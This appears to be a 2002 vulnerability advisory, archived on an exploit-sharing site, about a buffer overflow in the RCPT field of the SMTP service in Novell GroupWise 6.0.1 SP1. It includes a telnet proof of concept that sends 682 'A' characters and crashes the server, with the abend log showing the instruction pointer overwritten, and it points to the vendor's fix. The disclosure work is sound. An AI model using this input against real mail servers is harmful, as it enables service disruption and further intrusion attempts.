exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

groupwise.6.0.1.txt

groupwise.6.0.1.txt
Posted Jul 30, 2002
Authored by Marco van Berkum | Site ws.obit.nl

Novell GroupWise Internet Agent 6.0.1 sp1 contains a buffer overflow in the smtp service which can be exploited over port 25. Tested on Novell NetWare 5.1 sp3. Fix available here.

tags | overflow
SHA-256 | a176e4e5a0799c3a71f7a3f6764dbd5dc8b33db8e6a3951197adf2671d937e12

groupwise.6.0.1.txt

Change Mirror Download
-----------------------------------------------------------------------
Title: Novell GroupWise 6.0.1 Support Pack 1 Bufferoverflow
Author: Marco van Berkum
Classification: High risk
Date: 25/07/2002
Email: m.v.berkum@obit.nl
Company: OBIT
Company site: http://www.obit.nl
Personal website: http://ws.obit.nl
-----------------------------------------------------------------------

Problem
-------
A bufferoverflow was found in Novell GroupWise 6.0.1 (Support Pack 1).
Malicious users can insert code in the RCPT field that leads to a
bufferoverflow which crashes the machine and potentially is exploitable
(this has not been tested, there was already a fix available).

Vulnerable version information
------------------------------
This overflow was found in GroupWise 6.0.1 Service Pack 1 on a Novell
NetWare 5.1 Support Pack 3. According to Novell and my own findings
GW SP2 is NOT vulnerable to this attack. This was not tested on other
versions and Support Packs of NetWare.

Method and technical information
--------------------------------
Hostname and IP have been changed for privacy reasons.

$ telnet groupwise 25
Trying 192.168.1.1...
Connected to groupwise.
Escape character is '^]'.
220 220 groupwise GroupWise Internet Agent 6.0.1 (C)1993, 2002 Novell, Inc. Ready
helo bla
250 groupwise Ok
mail from: me@somehost.com
250 Ok
rcpt to: lots of A's (found it by inserting 682 A's)
^]
telnet> q
Connection closed.
$

At this point the server crashed and was unreachable.

Below is the abend log of the mailserver.

--------------ABEND LOG----------------

Server groupwise halted Wednesday, 3 July 2002 9:28:57
Abend 1 on P00: Server-5.00j: Page Fault Processor Exception (Error code 00000000)

Registers:
CS = 0008 DS = 0010 ES = 0010 FS = 0010 GS = 0010 SS = 0010
EAX = 00000000 EBX = 41414141 ECX = A831E7FC EDX = A8320275
ESI = 41414141 EDI = 41414141 EBP = 41414141 ESP = A831E910
EIP = 41414141 FLAGS = 00014206
Address (41414141) exceeds valid memory limit
EIP in UNKNOWN memory area
Access Location: 0x41414141

The violation occurred while processing the following instruction:



Running process: GWIA-smtprcv-008 Process
Created by: NetWare Application
Thread Owned by NLM: GWIA.NLM
Stack pointer: A831E770
OS Stack limit: A8318760
Scheduling priority: 67371008
Wait state: 5050090 (Wait for interrupt)
Stack: --41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?
--41414141 ?

Additional Information:
The CPU encountered a problem executing code in SERVER.NLM.
The problem may be in that module or in data passed to that
module by a process owned by GWIA.NLM.
--------------EOF--------------

Solution
--------
Apply Support Pack Beta-2.
http://support.novell.com/filefinder/12886/beta.html

Vendor's response
-----------------
The problem has been discussed, Support Pack Beta-2 already
fixed this problem before it was found.

Credits
-------
Thanks go out to Robert Braeutigam for testing and other support.

Just my 2 cents,
Marco van Berkum


--
'How come we know about the secret service ?'
----------------------------------------
| Marco van Berkum / MB17300-RIPE |
| m.v.berkum@obit.nl / http://ws.obit.nl |
----------------------------------------



Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    0 Files
  • 5
    Mar 5th
    0 Files
  • 6
    Mar 6th
    0 Files
  • 7
    Mar 7th
    0 Files
  • 8
    Mar 8th
    0 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    0 Files
  • 12
    Mar 12th
    0 Files
  • 13
    Mar 13th
    0 Files
  • 14
    Mar 14th
    0 Files
  • 15
    Mar 15th
    0 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    0 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close